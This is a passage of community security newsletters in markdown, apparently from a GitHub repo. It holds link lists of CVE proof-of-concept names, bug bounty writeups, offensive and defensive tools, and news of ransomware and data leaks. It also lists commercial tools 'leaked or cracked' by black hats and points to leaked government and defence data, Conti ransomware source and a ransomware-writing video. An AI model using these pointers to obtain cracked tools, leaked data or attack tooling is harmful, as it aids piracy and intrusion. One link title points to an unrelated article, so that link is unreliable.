Twitter Threads, News, Announcements & Tips 🟢\n </b></summary>   \n \n - Announcements 🟢 :\n   - Black Reward, an [Iranian hacker group, claims to have breached the Iranian government and exfiltrated sensitive data related to their nuclear programs.](https://twitter.com/vxunderground/status/1583568821675126784)\n   - Windows Terminal Now [Default in Windows 11](https://devblogs.microsoft.com/comman) and [Windows Terminal on GitHub](https://github.com/microsoft/terminal)\n  \n - Threads, Resources, News & Tips 🟢 :\n  \n   - The ResetHacker community [wishes a happy Diwali to the community after 1 year](https://twitter.com/resethacker/status/1584185937692880899)\n   - Jack Hacks is releasing a [3-part browser exploitation series on Chrome!](https://t.co/bbFjOOzlOu) This was written to help beginners break into the browser exploitation field; Part 1 covers V8 internals such as objects, properties, and memory optimizations. Enjoy! \n   - Tuan Anh Nguyen shared a thread where he mentioned that [Spring Boot Actuators Misconfiguration is another gold mine in bug bounty.](https://twitter.com/haxor31337/status/1584578975992803328)\n   - Froggy is trying to [build an Attack Surface Management tool](https://twitter.com/iamthefrogy/status/1581768423649837056)\n\n   \n</details>  \n \n<details> \n<summary><b> 4. 
Update on Data breaches & Black Hat hacker leaks 👇🔴\n</b></summary> \n   \n - 🔴 **Update - Paid Tools** that have been leaked or cracked by Black Hat Hackers : \n      > Cobaltstrike 4.7.2 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, Acunetix Version 15 build 15.0.221007170 for Windows and Linux – 13th October 2022, BurpSuite_pro_v2022_9.4, Nessus Core + tenableSC 20220307 ISO  & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, WinLicense x32/x64 v3.1.3.0, bruteratel 1.2.2, and 010 Editor 13.0-beta2, cellebrite | UEFD, IDA Pro 8.0.\n \n - 🔴 **Update - Black Hat Hacker leaks & activity** : 4\n\n     - The HIVE ransomware group has ransomed Tata Power, a multi-billion dollar electric utility company based in Mumbai, India.\n       > Tata has confirmed the breach. Customer and sensitive data are affected, but core functionality is present and customers still have electricity.\n     - Indonesian nuclear agency internal files leak\n        > These 1.4 GB worth of files regarding the nuclear power authority in Indonesia are being leaked in response to police brutality and corruption by the Indonesian government.\n     - We have verified the Indian government and military defence data mega leak \n        > Includes all kinds of top secret, secret and confidential documents from the following sectors: ALISDA, DGAQA, MSQAA, DRDO, DDP, Joint Defence Secretary India, BSF, MOD and the Indian Navy.\n     - Conti source code for v3.7.7 and ransomware builder tools have been circulated around private groups, and the Taurus bot source code has been leaked. \n \n</details> \n \n<details> \n<summary><b>\n5. Hiring/Jobs\n</b></summary>\n \n> In this beginner-friendly segment, we talk about and share the latest resources related to jobs this month, interview questions and free training offered by organizations, communities and leaders.\n \n - 1. 
Take a Look at [Internship/Job Openings in October 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. Here ResetHacker has collected [Interview Questions asked by organizations](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n - 3. [Cybersecurity Jobs HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)\n \n</details> \n</details> \n\n<span id=\"title-bb\"></span>\n<details> \n<summary><b> 🐞🐞🐞 BUG BOUNTY 🐞🐞🐞 \n \n > Everything related to Bug Bounty : reports, writeups and resources\n </b></summary>   \n\n <details> \n <summary><b>1. Hackerone/Bugcrowd reports worth reading for Bug Hunters : 4 Reports </b></summary>\n \n *1. In this segment, we have filtered out top **HACKERONE/BUGCROWD REPORTS** for Bug Hunters :*\n   - 🐞 $13,000 **weakness** : Authentication Bypass Using an Alternate Path or Channel on Stripe where the **impact** was [Mass Accounts Takeover Without any user Interaction at https://app.taxjar.com/](https://hackerone.com/reports/1685970)\n   - 🐞 $2,000 **weakness** : Command Injection - Generic on Hyperledger where the **impact** was [POOL_UPGRADE request handler may allow an unauthenticated attacker to remotely execute code on every node in the network.](https://hackerone.com/reports/1705717)\n   - 🐞 $1,000 **weakness** : Server-Side Request Forgery (SSRF) on Acronis where the **impact** was [mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040](https://hackerone.com/reports/1719719)\n   - 🐞 $1,000 **weakness** : SQL Injection on U.S. Dept Of Defense where the **impact** was [Unauthenticated SQL Injection at █████████ [HtUS]](https://hackerone.com/reports/1719719)\n   </details> \n \n<details> \n<summary><b>2. BUG BOUNTY : writeups, tips & resources. </b></summary>\n \n *2. 
In this beginner-friendly segment, we collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n \n  - **Writeups : 11** :\n      - A journey of [fuzzing Nvidia graphic driver leading to LPE exploitation](https://github.com/quarkslab/conf-presentations/blob/master/Hexacon-2022/hexacon_2022_a_journey_of_fuzzing_nvidia_graphic_driver.pdf)\n      - Regulator: [A unique method of subdomain enumeration](https://cramppet.github.io/regulator/index.html)\n      - Subdomain Enumeration [Tool Face-off 2022](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off)\n      - SSRF - [Case study of 124 bug bounty reports](https://t.me/resethacker/932) by Grzegorz Niedziela, founder of Bug Bounty Reports Explained.\n      - $23,000 for [Authentication Bypass & File Upload & Arbitrary File Overwrite](https://medium.com/@h4x0r_dz/23000-for-authentication-bypass-file-upload-arbitrary-file-overwrite-2578b730a5f8)\n      - Google [SSO misconfiguration leading to Account Takeover](https://medium.com/@0x4kd/google-sso-misconfiguration-leading-to-account-takeover-cf9bcf63e76e)\n      - Facebook [SMS Captcha Was Vulnerable to CSRF Attack](https://lokeshdlk77.medium.com/facebook-sms-captcha-was-vulnerable-to-csrf-attack-8db537b1e980)\n      - [Appsmith Patches Full-Read SSRF Vulnerabilities Reported by CloudSEK](https://cloudsek.com/appsmith-patches-full-read-ssrf-vulnerabilities-reported-by-cloudsek/)\n      - [Error based SQL Injection with WAF bypass manual Exploit 100%](https://c0nqr0r.medium.com/error-based-sql-injection-with-waf-bypass-manual-exploit-100-bab36b769005)\n      - [Story about Escalation of HTML Injection to EC2 Instance credentials leak](https://medium.com/@Cybervenom/story-about-escalation-of-html-injection-to-ec2-instance-credentials-leak-e2cbd7343a83)\n      - Firing 8 [Account Takeover Methods](https://0xmaruf.medium.com/firing-8-account-takeover-methods-77e892099050)\n\n   \n - **New Resources Found + Non-Technical : 4**\n    - [OSCP 
Exam Change | Offensive Security](https://www.offensive-security.com/offsec/oscp-exam-structure/)\n    - [Cyber Security Career Pathways](https://blog.marcolancini.it/2022/blog-cyber-security-career-pathways/) \n      > Marco Lancini shows his concern over organizations trying to sell their certifications and drafted a mindmap; it is a first attempt at grouping roles into macro-functions commonly found in tech companies.\n    - [Which part of the security community are you in?](https://www.philvenables.com/post/field-guide-to-the-various-communities-of-security)\n      > Field Guide to the Various Communities of Security\n    - [How to get a Cyber Security Job at Google](https://pentestingguide.com/how-to-get-google-cyber-security-jobs/)\n      > If you want to become a hacker, bug bounty hunter or cyber security analyst and your dream job is Google, Microsoft or Facebook, then this article is really going to help you.\n\n\n </details> \n \n <details> \n<summary><b>3. Bug Bounty HELPDESK by ResetHacker Community.</b></summary>\n \n   - [Bug Bounty FAQ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md)\n   - [Bug bounty Setup & hacker daily utility](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/setup/Readme.md) \n   - [Bug Bounty Resources, recon methodology wordlists, mindmaps, checklists etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty)\n \n</details> \n\n</details> \n \n  <span id=\"title-tools\"></span>\n<details> \n<summary><b> 🛠️🛠️🛠️ NEW TOOLS FOUND 🛠️🛠️🛠️\n \n > List of tools that serve the hacker's purpose in every domain.👇\n </b></summary> \n\n> Community members test the tools and we filter out the most in-demand and helpful tools that serve the hacker's purpose in different domains.\n\n<details>\n<summary><b>1. 
SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 5 Tools</b></summary>\n   \n  - Janus : [String obfuscation tool based on the CIA's Marble Framework](https://github.com/echtdefault/Janus)\n  - vaf : [A fast, simple, and feature-rich web fuzzer written in Nim](https://github.com/d4rckh/vaf)\n    > Features: ▫️ Fast threading ▫️ HTTP header fuzzing ▫️ Proxying ▫️ Your own features ▫️ And more...\n  - [Text4Shell scanner for Burp Suite](https://github.com/silentsignal/burp-text4shell)\n  - [Ghauri](https://github.com/r0oth3x49/ghauri)\n    > An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws.\n  - [XSLeaker](https://github.com/Philesiv/XSLeaker)\n    > XSLeaker is a tool that helps to find XS-Leaks (https://xsleaks.dev/) on websites. The tool compares resource values for which a leak technique is known (e.g. number of iframes) between different stat\n \n </details>\n \n<details>\n<summary><b>2. Cloud Security - 3 Tools </b></summary>\n \n  - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n  - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n  - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting Assets from Cloud Providers. \n     > This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration effort.\n </details> \n\n<details>\n<summary><b>3. Blue/Red/Purple Team, IR and Threat intelligence - 4 Tools </b></summary>\n\n  - [WMEye](https://github.com/pwn1sher/WMEye)\n       > A post-exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement. 
\n  - [Headless Strike](https://github.com/CodeXTF2/cobaltstrike-headless)\n     > It is an Aggressor script that turns the headless aggressor client into a (mostly) functional Cobalt Strike client. \n  - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) \n     > varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n  - [exploits-predict](https://github.com/wisoffe/exploits-predict) \n     > Predicting the probability of an exploit being released after a CVE is published (by a machine learning algorithm); this project is based on the [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n\n</details> \n\n<details>\n<summary><b>4. Reverse Engineering, Encryption & OSINT - 7 Tools </b></summary> \n\n  - Jetstack Paranoia: [A New Open Source Tool for Container Image Security](https://www.jetstack.io/blog/announcing-paranoia/)\n  - Hashview: [A web front-end for password cracking and analytics.](https://github.com/hashview/hashview)\n  - [NoRunPI: Run Your Payload Without Running Your Payload](https://github.com/ORCx41/NoRunPI)\n  - [SteaLinG v0.3](https://github.com/De3vil/SteaLinG)\n     > SteaLinG is an open-source penetration testing framework designed for social engineering. After the hack, you can upload it to the victim's device and run it.\n  - A simple, (almost) POSIX [shell script for mail security checks](https://github.com/jeffbencteux/mailsecchk)\n  - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. \n     > Its objective is to deliver a fast and flexible “first view” for malware analysts, stable and capable of handling malformed PE files.\n  - OSINT-Bookmarklets: [Fast Search including Dark Web Search.](https://github.com/C3n7ral051nt4g3ncy/OSINT-Bookmarklets)\n\n </details> \n\n<details>\n<summary><b>5. 
IoT, OS & Hardware - 4</b></summary>   \n      \n   - [Open Athena](https://github.com/mkrupczak3/OpenAthena) \n      > It is a project which allows consumer and professional drones to spot precise locations through their images. This is accomplished by combining their [sensor metadata](https://github.com/mkrupczak3/OpenAthena/blob/main/drone_sensor_data_blurb.md) with an [offline-ready Digital Elevation Model](https://github.com/mkrupczak3/OpenAthena/blob/main/EIO_fetch_geotiff_example.md) to provide the instant location of what is being observed.\n\n   - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n   - [Cotopaxi](https://github.com/Samsung/cotopaxi) \n      > Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n   - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) \n      > Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n </details> \n</details> \n\n---\n  \n<details>\n<summary> 🤝🤝🤝 Team/Contributor and Community Engagement partners and resources that help in drafting the Weekly Infosec Update.🤝🤝🤝 </summary>\n\n> Huge thanks to our awesome [Community Leaders for contributing and giving back to the community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md), and thank you for being part of the team.\n   - Contributors : Good Resources Share, Paul Miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n> I'm very grateful to all the [organizations, groups, and communities that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). 
Without their support, distributing \"Weekly InfoSec Update\" among hackers would not have been possible.\n\n> Resources from [organizations and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us draft the [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate./md).\n\n </details>\n \n ---\n\n#### Wrapping Up\n <div align=\"\"><br>\n <a href=\"mailto:resethackerofficail@gmail.com?subject=RESETHACKER Community:\" target=\"_blank\"><img src=\"https://img.shields.io/badge/Gmail-D14836?logo=gmail\"></a>\n</div>\nHave questions, suggestions, feedback, or want to contribute? Just reply directly by mail (resethackeroffical@gmail.com); I'd love to hear from you.\n\nIf you find this update useful and know other people who would too, I'd really appreciate it if you'd forward it to them. Thanks for reading!\n \n  \n<p align=\"\"><img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"Pentesting-Bugbounty//ResetCybersecuirty/\" /> </p> \n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_12.md",
    "content": "#### Hey Hackers, I hope you have all enjoyed your Weekend!! \n\n > Here are the agenda for Weekly infosec Update v0.7 : 26th October- 1st November 2022\n\n \n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n\nThe best ways to SAVE TIME & read this newsletter?\n\n- Select the topic from the Navbar bellow and click on Summary/Preview and Arrow (>) to see the Details:\n\n- Open all relevant titles in a New Tab (Ctrl+Click) and read each one by one.\n\n[![cve poc](https://img.shields.io/badge/-CVE-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![research & Business](https://img.shields.io/badge/-Research-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![beginners](https://img.shields.io/badge/-News-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-beginners) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![tools](https://img.shields.io/badge/-Tools-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-tools) \n\n![WIU_Trail_Pro](https://user-images.githubusercontent.com/25515871/191970244-14b8821b-acd9-4fb6-8e9b-f627392c4715.png)\n\n---\n\n<span id=\"title-cve\"></span>\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n### Week -> [**26th October- 1st November 2022**](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)👈.\n\n <summary>\n\nSecurity patched within a week: \n\n   > We have tracked the latest Security Advisories from top vendors and filtered out high and critical vulnerabilities that have been patched. 
Mozilla, Microsoft, Jenkins, GitHub, Cisco, Linux (Ubuntu 22.4, 20.4 & 18.4 LTS) & CISA advisories are available this week.\n\n</summary>\n\n<summary>\n\nCVE Analysis, writeups and reports: (A total of 6 CVEs this week)\n\n\n   > This week, we have collected the recently published write-ups for CVEs of critical or higher severity. \n\n</summary>\n\n <summary> \n\n PoC for CVEs & exploits (A total of 12 newly discovered 0-days this week):\n\n\n> Every week, we track the most recent exploits and patches for CVEs.  \n\n</summary>\n\n<details>\n\n<summary><b>Summary/Preview</b></summary>\n\n > Week -> [**19th October- 25th October 2022**](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md) 👈.\n\n \n\n      CVE:ANALYSIS & POC:          CVE-2022-40684, Zimbra 0-day CVE-2022-41352, CVE-2022-42889/ Text4Shell, CVE-2022-37969 \n\n                                   CVE-2022-3236 & CVE-2022-36966. \n\n         \n\n      CVE POC (0-Day):             7-ZipPostExploit, CVE-2022-21970, CVE-2022-41040-metasploit-ProxyNotShell, CVE-2022-22947, Sploits,                                         \n\n                                   CVE-2022-42045, CVE-2022-36663, CVE-2022-3368, CVE-2022-27502, CVE-2022-23131, CVE-2021-46422 (Google Chrome).\n\n \n\n</details> \n\n---\n\n<span id=\"title-research\"></span>\n\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\nThe goal of this segment is to collect the latest and most relevant articles/whitepapers/research/techniques/resources across all infosec domains that will benefit independent researchers and professionals who need to stay current with the latest security developments, look for more innovative approaches to finding CVEs/bugs, and track the infosec market and startups. 
\n\n<details> \n\n<summary><b>1 - Infosec Business, funded and Market</b></summary> \n\n  \n - 1 - Infosec Business, funded and Market \n\n     - [Top cybersecurity trends for 2023](https://www.spiceworks.com/it-security/cyber-risk-management/guest-article/the-top-cybersecurity-trends/) \n\nIn Taylor Hersom's talk he mentioned multiple reports such as Q1 2022 resulted from cyberattacks, Persistent Phishing, The Digital Supply Chain Problem, The Cybersecurity Mesh and Distributed Approach.\n\n   - What Does It Mean To [‘Invest In Cybersecurity’ In 2022 And Beyond?](https://www.forbes.com/sites/theyec/2022/10/19/what-does-it-mean-to-invest-in-cybersecurity-in-2022-and-beyond/?sh=571ea1b51eb5)\n\n   - [A comparison of cybersecurity regulations](https://law.asia/comparison-cybersecurity-regulations/)\n\n   - Gartner Survey Finds [88% of Boards of Directors View Cybersecurity as a Business Risk](https://www.gartner.com/en/newsroom/press-releases/2022-10-19-gartner-says-89-percent-of-board-directors-say-digital-is-embedded-in-all-business-growth-strategies)\n\n    \n\n  - Infosec Market Helpdesk  \n\n\n     - The Cybersecurity Market Size is Expected to Hit US$266.2 Billion by 2027, reflecting a constant-currency compound annual growth rate of 11% from 2021.\n\n     - The global cybersecurity workforce gap has increased by 26.2% compared to 2021, with 3.4 million more workers needed to secure assets effectively, according the [(ISC)2 2022 Cybersecurity Workforce Study](https://www.isc2.org//-/media/ISC2/Research/2022-WorkForce-Study/ISC2-Cybersecurity-Workforce-Study.ashx)\n\n        > This represents a stark increase in the shortage of cybersecurity professionals compared to 2021, which stood at 2.72 million. 
The research surveyed 11,779 individuals responsible for cybersecurity.\n\n     - [Report from ReportLinker](https://www.reportlinker.com/p06352700/Global-Artificial-Intelligence-In-Cybersecurity-Market-Size-Share-Industry-Trends-Analysis-Report-By-Offering-By-Vertical-By-Application-By-Type-By-Technology-By-Regional-Outlook-and-Forecast-.html) \n\n       > The global artificial intelligence in cybersecurity market size is expected to reach $57.1 billion by 2028, growing at a 24.5% CAGR during the forecast period.\n\n\n     - This research shares insight into the [Indian market and its clients, and helps you understand who the right client for your business is](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing)  \n\n     - Investors and venture capital (VC) firms for cybersecurity startups: [100x.vc: to get investment in India](https://www.100x.vc/), [Liberty City Ventures](https://www.libertycityventures.com/),  [Evolution Equity](https://evolutionequity.com/),  [M12VC](https://m12.vc/),  [Team8.VC](https://team8.vc/),  [Centerstone Capital](https://www.centerstone.capital/),  [Insight partners](https://www.insightpartners.com/),  [World Trade Venture](http://worldtradeventures.com/), [Menara Venture](https://menaraventures.com/)  etc.\n\n      \n\n  </details>\n\n  \n\n<details>\n\n<summary><b> 2. 
Research/Article discussed by professionals or independent researchers </b></summary>\n\n   \n\n - 1 - Web Security and android security\n\n \n\n     - [Analysis of thousands of active API tokens leaked via public package repositories](https://jfrog.com/blog/jas-secrets-detection-reveals-active-tokens/)\n\n     - [Bringing Modern Authentication APIs (FIDO2 WebAuthn, Passkeys) to Linux Desktop](https://github.com/AlfioEmanueleFresta/xdg-credentials-portal)\n\n     - [HTTP/3 connection contamination: an upcoming threat](https://portswigger.net/research/http-3-connection-contamination)\n\n     - RPC Toolkit - [security research oriented resources on MS-RPC (articles, PoCs, vulnerability write-ups, tools, etc.)](https://github.com/akamai/akamai-security-research/tree/main/rpc_toolkit)\n\n     - postMessage Braindump - [a brief postMessage testing methodology](https://rhynorater.github.io/postMessage-Braindump)\n\n     - [Userland Execution of Binaries Directly from Python](https://www.anvilsecure.com/blog/userland-execution-of-binaries-directly-from-python.html)\n\n     - In a nutshell: [data protection, privacy and cybersecurity in India](https://www.lexology.com/library/detail.aspx?g=b06b310c-76d0-4625-8b21-b0dba79bdf52)\n\n     - SANS released a survey [Think Like a Hacker: Inside the Minds and Methods of Modern Adversaries | September 2022](https://drive.google.com/file/d/1LiandSv7-TNGpzY5IsUzPNDReDVTiJgl/view?usp=sharing)\n\n - 2 - Cloud Security & Automation\n\n     - [Kubernetes CRD validation with CEL and kubebuilder marker comments](https://blog.rewanthtammana.com/kubernetes-crd-validation-with-cel-and-kubebuilder-marker-comments)\n\n     - [How an Attacker Can Achieve Persistence in Google Cloud Platform (GCP) with Cloud Shell](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)\n\n     - [October : Google Cloud Latest news & 
Update](https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud)\n\n  \n\n - 3 - Blue/Red/Purple/Threat Intelligence Team\n\n   - Blue Team \n\n     - [Verizon 2022 Data Breach Investigations Report (DBIR)](https://www.verizon.com/business/resources/reports/dbir/2022/master-guide/)\n\n     - [How to Investigate Insider Threats (Forensic Methodology)](https://www.inversecos.com/2022/10/how-to-investigate-insider-threats.html) \n\n     - [How a Microsoft blunder opened millions of PCs to potent malware attacks](https://arstechnica.com/information-technology/2022/10/how-a-microsoft-blunder-opened-millions-of-pcs-to-potent-malware-attacks/)\n\n     - [Microsoft Defender adds command and control traffic detection](https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-adds-command-and-control-traffic-detection/)\n\n     - [Microsoft Office 365 Message Encryption Insecure Mode of Operation](https://labs.withsecure.com/advisories/microsoft-office-365-message-encryption-insecure-mode-of-operation)\n\n     - [#StopRansomware: Daixin Team](https://www.cisa.gov/uscert/ncas/alerts/aa22-294a)\n\n\n   - Red Team\n\n     - [Nighthawk 0.2.1 – Haunting Blue](https://www.mdsec.co.uk/2022/11/nighthawk-0-2-1-haunting-blue/)\n \n     - [Scripts to detect canary tokens](https://www.reddit.com/r/redteamsec/comments/yi8sqk/scripts_to_detect_canary_tokens)\n \n     - [Environment configuration for Red Team cyber security testing and tasks](https://github.com/zackjmccann/red-team-security)\n\n     - [One shell to HANDLE them all](https://kotaku.com/genshin-impact-fanart-ai-generated-stolen-twitch-1849655704)\n\n     - [Hidden DNS resolvers and how to compromise a fully-patched WordPress instance](https://sec-consult.com/blog/detail/melting-the-dns-iceberg-taking-over-your-infrastructure-kaminsky-style/)\n\n\n  - 4. 
HelpDesk\n\n     - [Pentesting HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/Readme.md) by the ResetHacker Community.\n  \n     - [API security checklist](https://github.com/shieldfy/API-Security-Checklist)\n\n    \n\n</details>\n\n---\n\n<span id=\"title-beginners\"></span>\n\n### Friendly Segment\n\n   > We have tried to solve the problem \"How to stay up to date with the latest Bug Bounty community without wasting time on social media\". This segment is for intermediate bug hunters and ethical hackers, with news and segments that are common to professionals and intermediates alike.\n\n  <details> \n  <summary><b> 📰📰📰 Hackers NEWS 📰📰📰  \n  \n    > Based on hacker demands, we have reorganized infosec news into 5 different segments.👇\n\n   </b></summary>   \n\n  <details> \n\n  <summary><b> 1. Top 3 infosec News</b></summary> \n\n   - [Elon Musk after taking over Twitter](https://www.tweaktown.com/news/business_financial_and_legal/index.html)\n\n   - Dropbox discloses [breach after hacker stole 130 GitHub repositories.](https://www.bleepingcomputer.com/news/security/dropbox-discloses-breach-after-hacker-stole-130-github-repositories/)\n\n   - Hacker steals Ed Sheeran's unreleased music, sells it to make nearly $150,000\n     > BBC reports that Kwiatkowski managed to steal the unreleased music by hacking into the artist's cloud-based accounts, with Sheeran and Lil Uzi Vert only being some of the artists impacted by Kwiatkowski, as authorities found 1,263 unreleased songs from 89 artists on his laptop during the seizure. Notably, the laptop also contained other incriminating evidence, such as documents that detailed how Kwiatkowski hacked into the victims' accounts, as well as the Bitcoin he admitted to receiving in return for distributing the unreleased songs.        \n\n</details> \n\n \n\n<details> \n\n<summary><b> 2. 
Event recap </b></summary>\n\n \n\n   Haxacon 2022, mWISE 2022 and BountyCon slides were hot topics this week in the community. We have gathered relevant Talks, Slides, Tools, Podcasts, Videos, and upcoming events related to conferences, talks & webinars for you to watch them, at your convenience.\n\n - Conferences\n\n   - [Defcon30 2022 : videos](https://www.youtube.com/user/DEFCONConference/videosw) recommended and Filtered by InsiderPhD\n\n      - Hacking doors / Access control system hacking\n      - Silk – How to Lock Pick\n      - BiC Village – Ochuan Marshall – The Last Log4J Talk You Ever Need\n      - James Kettle – Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling\n      - Daniel Jensen – Hunting Bugs in the Tropics\n      - Orange Tsai – Let’s Dance in the Cache – Destabilizing Hash Table on Microsoft IIS\n      - Michael Bargury – Low Code High Risk – Enterprise Donation via Low Code Abuse\n      - Jeffrey Hofmann – PreAuth RCE Chains on an MDM – KACE SMA\n      - DC30 DCGVR Talks – Careful Who You Colab With\n      - Samuel Erb, Justin Gardner – Crossing the KASM – a Webapp Pentest Story\n      - Thomas Roth , Solana – JIT – Lessons from fuzzing a smart contract compiler\n      - Richard Thieme – UFOs, Alien Life, and the Least Untruthful Things I Can Say\n      - stacksmashing – The Hitchhacker’s Guide to iPhone Lightning and JTAG Hacking\n      - Retail Hacking Village – Spicy Wasabi – Rock The Cash Box\n\n\n\n  - Webinars and videos\n    - Saytronic : [Hackers are finally using Drones](https://www.youtube.com/watch?v=r6g7EH8dKRM)\n    - HackTheBox - Faculty - [SQL Injection on Update Statements and Inject Shellcode with GDB!](https://www.youtube.com/watch?v=LGO-dn7668g)\n    - Practical ctf - [Hacking into a law firm to delete al client case](https://youtu.be/Q5THt8IzXHw)\n    - [Writing Ransomware for VMWare ESXi](https://youtu.be/dB0dOF1ood0)\n    - Cybersecurity [public speaking techniques | Guest Lisa 
Tetrault](https://youtu.be/E6EfJyFjvDc)    \n\n  - Ongoing/Upcoming:   \n\n   - Registration : \n    - For startups, we have good news from 100x.vc. [100X Gurukul applications are open](gurukul.100x.vc), all at No Cost, No Equity, No Fee! \n    - Google Cloud [Best of Next '22](https://cloudonair.withgoogle.com/events/apac-best-of-next22) | November 24, 2022 - November 25, 2022 | Virtual\n        > Discover the latest product announcements and new ideas, and supercharge your skills with insights from leading professionals and real-world technology applications.\n    - 100x.vc is back with [Founders dating](https://www.100x.vc/founders-dating) | 11th November, Bengaluru\n\n   - Events :\n    - IT-SA : 25th to 27th October | Nuremberg, DE \n\n</details> \n\n \n\n <details> \n\n <summary><b> 3. Twitter Threads, News, Announcements & Tips 🟢\n\n </b></summary>   \n\n \n\n - Announcement 🟢 :\n\n   - Black Reward, an [Iranian hacker group, claims to have breached the Iranian government and exfiltrated sensitive data related to their nuclear programs.](https://twitter.com/vxunderground/status/1583568821675126784)\n\n   - Windows Terminal is now the [default in Windows 11](https://devblogs.microsoft.com/comman) and [Windows Terminal on GitHub](https://github.com/microsoft/terminal)\n\n  \n\n - Threads, Resources, News & Tips 🟢 :\n\n  \n   - Jeroen van der Ham shared a thread where [@1sand0s, @ncsc_nl and @CyberSecTUDelft interviewed 22 organizations to find out how organizations filter and prioritize vulnerability information](https://twitter.com/1sand0s/status/1583379375797329922)\n\n   - Froggy is trying to [build an attack surface management tool](https://twitter.com/iamthefrogy/status/1581768423649837056)\n \n\n</details>  \n\n \n\n<details> \n\n<summary><b> 4. 
Update on Data breach & Blackhat hackers Leaked 👇🔴\n\n</b></summary> \n\n   \n\n - 🔴 Update - Paid Tools that has been leaked or cracked by Black Hat Hackers : \n\n      > Cobaltstrike 4.7.2 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, Acunetix Version 15 build 15.0.221007170 for Windows and Linux – 13th October 2022, BurpSuite_pro_v2022_9.4, Nessus Core + tenableSC 20220307 ISO  & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, WinLicense x32/x64 v3.1.3.0, bruteratel 1.2.2, and 010 Editor 13.0-beta2, cellebrite | UEFD.\n\n \n\n - 🔴 Update - Black Hat Hacker leaked & activity : 4\n\n     - HIVE ransomware group has ransomed Tata Power, a multi-billion dollar electric utility company based in Mumbai, India.\n\n       > Tata's confirmed the breach. Customers and sensitive data are effected, but core functionality is present and customers still have electricity.\n\n     - Nuclear agency internal files leak\n\n        > These 1.4 gb worth of files regarding the Nuclear power authority in Indonesia are being leaked in response to police brutality and corruption by the Indonesian government.\n\n     - We have verified the Indian government and defence sector leak \n\n        > Includes all kinds of top secret, secret and confidential documents from the following sectors, ALISDA, DGAQA, MSQAA, DRDO,DDP, Joint Defence Secretary India, BSF, MOD and the Indian Navy.\n\n     - Conti source code for v3.7.7, Ransomeware builder tools has been circulated around private group and Taurus bot source code has been 